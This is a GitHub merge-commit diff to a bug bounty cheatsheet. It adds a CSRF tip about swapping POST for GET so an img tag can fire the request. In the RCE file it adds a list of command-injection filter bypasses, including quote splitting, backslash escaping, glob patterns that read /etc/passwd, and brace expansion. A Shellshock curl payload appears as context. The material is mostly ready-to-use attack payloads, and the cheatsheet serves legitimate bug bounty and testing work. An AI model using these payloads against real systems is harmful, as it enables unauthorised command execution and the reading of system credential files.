Merge pull request #59 from kuromatae/master

Update bugbountytips.md

cheatsheets/bugbountytips.md

@@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies
 **Tip #6**
 
 Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/
+
+
+
+**Tip #7**
+
+When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score.
+For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim.

cheatsheets/rce.md

@@ -10,6 +10,27 @@ strіng
 
 If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
 
+**Basic Bypasses**
+
+```
+i'''d
+i"""d
+```
+
+```
+\l\s -l\a\h
+```
+
+```
+cat /e?c/p?ss??
+cat /e??/??ss*
+```
+
+```
+{ls,}
+{ls,-a}
+```
+
 **Shellshock Bug**
 
 ```bash
@@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru
 
 ```zsh
 curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
-```
+```